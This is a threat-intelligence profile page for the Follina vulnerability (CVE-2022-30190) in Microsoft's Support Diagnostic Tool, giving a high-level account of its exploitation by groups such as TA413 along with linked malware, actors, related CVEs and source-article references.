CVE-2022-30190

Vulnerability updated 4 months ago (2024-05-04T19:12:34.566Z)
Download STIX
Preview STIX
CVE-2022-30190, also known as the "Follina" vulnerability, is a high-risk software flaw in the Microsoft Support Diagnostic Tool that allows for remote code execution. This 0-day vulnerability was disclosed in May 2022 and has since been exploited by threat actors, including TA413, who weaponized it shortly after its discovery and publication. The exploitation of this vulnerability begins with a spear-phishing email containing a malicious Excel spreadsheet attachment. When opened, the vulnerability is used to download an MSI package from a remote server. Throughout the first half of 2022, TA413 not only exploited this vulnerability but also leveraged a now-patched zero-day vulnerability targeting the Sophos Firewall product (CVE-2022-1040). Additionally, they employed a newly observed custom backdoor known as LOWZERO in campaigns specifically targeting Tibetan entities. In June 2022, the group shifted their strategy and began using an exploit of the Follina vulnerability instead of malicious VBA code. The Follina vulnerability has been widely exploited and carries a high CVSS score of 7.8, indicating its severity. It has been used in various attack vectors, including being weaponized within a Microsoft Office document to drop Woody Rat malware. Alongside the PrintNightmare vulnerability (CVE-2021-34527), Follina's exploitation has been reported extensively, highlighting the significant security risk it poses to Microsoft users.
Description last updated: 2024-05-04T16:36:48.400Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Follina
9
Follina, also known as CVE-2022-30190, is a notable software vulnerability that was discovered and exploited in the first half of 2022. This flaw, found in the Microsoft Windows Support Diagnostic Tool (MSDT), was weaponized by TA413, a cyber threat actor group with suspected ties to China. The grou
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Vulnerability
Exploit
Microsoft
Exploits
exploited
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Malware
To see the evidence that has resulted in these malware associations, create a free account
IDTypeVotesProfile Description
LokibotUnspecified
2
LokiBot is a malicious software, or malware, that was first reported on October 24, 2020. It is designed to exploit and damage computer systems by infiltrating them through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, LokiBot steals personal information
Associated Threat Actors
To see the evidence that has resulted in these threatActor associations, create a free account
IDTypeVotesProfile Description
APT28Unspecified
2
APT28, also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM, is a threat actor linked to Russia that has been active since at least 2007. The group has targeted governments, militaries, and security organizations worldwide, including the German Social Democratic Party
Associated Vulnerabilities
To see the evidence that has resulted in these vulnerability associations, create a free account
IDTypeVotesProfile Description
Log4ShellUnspecified
3
Log4Shell is a significant software vulnerability that exists within the Log4j Java-based logging utility. The vulnerability, officially designated as CVE-2021-44228, allows potential attackers to execute arbitrary code on targeted systems. Advanced Persistent Threat (APT) actors, including LockBit
ProxyshellUnspecified
3
ProxyShell is a series of vulnerabilities affecting Microsoft Exchange email servers. These flaws in software design or implementation have been exploited by threat actors to gain unauthorized access and control over targeted systems. The ProxyShell vulnerability, officially tracked as CVE-2021-3447
Source Document References
Information about the CVE-2022-30190 Vulnerability was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
Securelist
17 days ago
Analyzing the vulnerability landscape in Q2 2024
DARKReading
a month ago
Russia's 'Fighting Ursa' APT Uses Car Ads to Install HeadLace Malware
CISA
a month ago
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
Securityaffairs
4 months ago
NATO and the EU formally condemned APT28 cyber espionage
MITRE
9 months ago
Woody RAT: A new feature-rich malware spotted in the wild
Securityaffairs
9 months ago
Russia's APT8 exploited Outlook 0day to target EU NATO members
Securityaffairs
9 months ago
Russia-linked APT28 group spotted exploiting Outlook flaw to hijack MS Exchange accounts
CERT-EU
10 months ago
Several French critical networks subjected to Russian APT attacks
CERT-EU
10 months ago
How APT28 Infiltrates Networks in French Universities & Nuclear Plants Without Detection
Securityaffairs
10 months ago
ANSSI warns of Russia-linked APT28 attacks on French entities
CERT-EU
a year ago
The Hidden Dangers of Remote Code Execution (RCE) Exploits in Word Documents
CERT-EU
a year ago
LokiBot Information Stealer Packs Fresh Infection Strategies
CERT-EU
a year ago
Malspam attacks up, new sectors targeted – report
CERT-EU
a year ago
nao-sec.org
CERT-EU
a year ago
GroundPeony Group Exploiting Zero-day Flaw to Attack Government Agencies
CERT-EU
a year ago
GroundPeony Group Exploiting Zero-day Flaw to Attack Government Agencies | IT Security News
CERT-EU
a year ago
Uncovering the internet's most enduring threat: The Email Threat Landscape
Malwarebytes
a year ago
2022's most routinely exploited vulnerabilities—history repeats
BankInfoSecurity
a year ago
Patching Conundrum: 5-Year Old Flaw Again Tops Most-Hit List
CERT-EU
a year ago
Five Eyes Agencies Call Attention to Most Frequently Exploited Vulnerabilities